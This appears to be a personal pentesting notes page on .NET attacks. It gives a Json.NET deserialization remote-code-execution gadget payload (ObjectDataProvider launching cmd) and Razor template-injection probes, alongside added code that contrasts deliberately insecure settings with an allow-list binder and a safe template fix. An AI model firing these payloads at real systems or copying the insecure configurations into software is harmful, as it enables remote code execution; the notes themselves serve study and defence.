xct's notes
.NET

Json.Net Deserialization

Requires a custom TypeNameHandling setting by the dev (not insecure by default!). One of the following must be true for the type that is deserialized:
  • It is the Object type (java.lang.Object or System.Object)
  • It is a non-generic collection (e.g.: ArrayList, Hashtable, etc.)
  • It implements IDynamicMetaObjectProvider
  • It is System.Data.EntityKeyMember or any type derived from it. In this case TypeNameHandling
    may not even need to be set to a non-None value (see the EntityKeyMemberConverter in
    "TypeConverters").
Common RCE payload (can also be created with ysoserial.net):
```json
{
  '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
  'MethodName':'Start',
  'MethodParameters':{
    '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
    '$values':['cmd','/c <payload>']
  },
  'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```
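Added example (not from the original notes, and not Json.NET's own code): the weak setting that makes the payload above work next to a hardened configuration. It keeps `TypeNameHandling` enabled for a legitimate polymorphic field but routes every `$type` value through an allow-list `ISerializationBinder`, so a discriminator naming `ObjectDataProvider`, `ArrayList` or any other foreign type is refused before anything is instantiated. It assumes Newtonsoft.Json 10 or later (for `ISerializationBinder`); the `Notification` types and the two input strings are constructed for the example.

```csharp
// Added example, not from the original notes. Assumes Newtonsoft.Json >= 10.
using System;
using System.Collections.Generic;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;

// Hypothetical message hierarchy that genuinely needs "$type" to pick a subclass.
public abstract class Notification { public string Recipient { get; set; } }
public class EmailNotification : Notification { public string Subject { get; set; } }
public class SmsNotification : Notification { public string Text { get; set; } }

// Allow-list binder: a "$type" value must be one of these short names.
// Nothing is ever resolved through Type.GetType or Assembly.Load.
public sealed class AllowListBinder : ISerializationBinder
{
    private static readonly Dictionary<string, Type> Allowed = new Dictionary<string, Type>
    {
        ["email"] = typeof(EmailNotification),
        ["sms"]   = typeof(SmsNotification),
    };

    public Type BindToType(string assemblyName, string typeName)
    {
        if (Allowed.TryGetValue(typeName, out var t)) return t;
        // Any other discriminator (ObjectDataProvider, ArrayList, Process, ...) is rejected.
        throw new JsonSerializationException($"Type '{typeName}' is not permitted for deserialization.");
    }

    public void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = null;
        foreach (var kv in Allowed)
            if (kv.Value == serializedType) { typeName = kv.Key; return; }
        throw new JsonSerializationException($"Type '{serializedType}' is not permitted for serialization.");
    }
}

public static class NotificationParser
{
    // Weak configuration: every "$type" in attacker-controlled input is honoured as written.
    public static readonly JsonSerializerSettings Insecure = new JsonSerializerSettings
    {
        TypeNameHandling = TypeNameHandling.All
    };

    // Hardened configuration: "$type" is honoured only for names the binder knows.
    public static readonly JsonSerializerSettings Hardened = new JsonSerializerSettings
    {
        TypeNameHandling = TypeNameHandling.Objects,
        SerializationBinder = new AllowListBinder()
    };

    public static Notification Parse(string json) =>
        JsonConvert.DeserializeObject<Notification>(json, Hardened);

    public static void Main()
    {
        // Constructed inputs: a legitimate message and one carrying a foreign "$type".
        string ok  = "{\"$type\":\"sms\",\"Recipient\":\"+100\",\"Text\":\"hi\"}";
        string bad = "{\"$type\":\"System.Collections.ArrayList, mscorlib\",\"$values\":[]}";

        Console.WriteLine(Parse(ok).GetType().Name);
        try { Parse(bad); }
        catch (JsonSerializationException e) { Console.WriteLine("rejected: " + e.Message); }
    }
}
```

The default, `TypeNameHandling.None`, is the safe choice whenever polymorphic input is not actually needed; when it is, the binder is what turns the gadget condition in the list above (a `$type` that resolves to an arbitrary loadable type) into a closed set of application types.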

ASP.NET Razor Template Injection (SSTI)

Check if vulnerable:
```
@(7*7)
```
Exploit:
```
@{
// C# code
}
```
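Added example (not from the original notes): the server-side pattern that makes the `@(7*7)` probe above evaluate, beside its fix. It assumes the RazorEngine NuGet package (`RazorEngine.Templating`, `Engine.Razor.RunCompile`); the greeting template and `GreetingModel` are constructed for the example.

```csharp
// Added example, not from the original notes. Assumes the RazorEngine package.
using System;
using RazorEngine;
using RazorEngine.Templating;

public class GreetingModel { public string Name { get; set; } }

public static class Greeter
{
    // Vulnerable: the request value is spliced into the template source, so a
    // Name of "@(7*7)" is compiled as Razor and renders "49".
    // (The per-call name defeats RazorEngine's template cache for the demo.)
    public static string RenderUnsafe(string name) =>
        Engine.Razor.RunCompile("<p>Hello " + name + "</p>",
                                "greet-unsafe-" + Guid.NewGuid(), null, null);

    // Fixed: the template is a server-side constant and the request value only
    // ever reaches it as model data, which Razor HTML-encodes on output, so the
    // same Name renders literally as "@(7*7)".
    public static string RenderSafe(string name) =>
        Engine.Razor.RunCompile("<p>Hello @Model.Name</p>", "greet-safe",
                                typeof(GreetingModel), new GreetingModel { Name = name });
}
```

The check from a defender's side is the same one the probe relies on: if any code path builds template source from request data, the `@(7*7)` test will come back as `49`, and the fix is to move the value into the model rather than to filter `@` characters.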
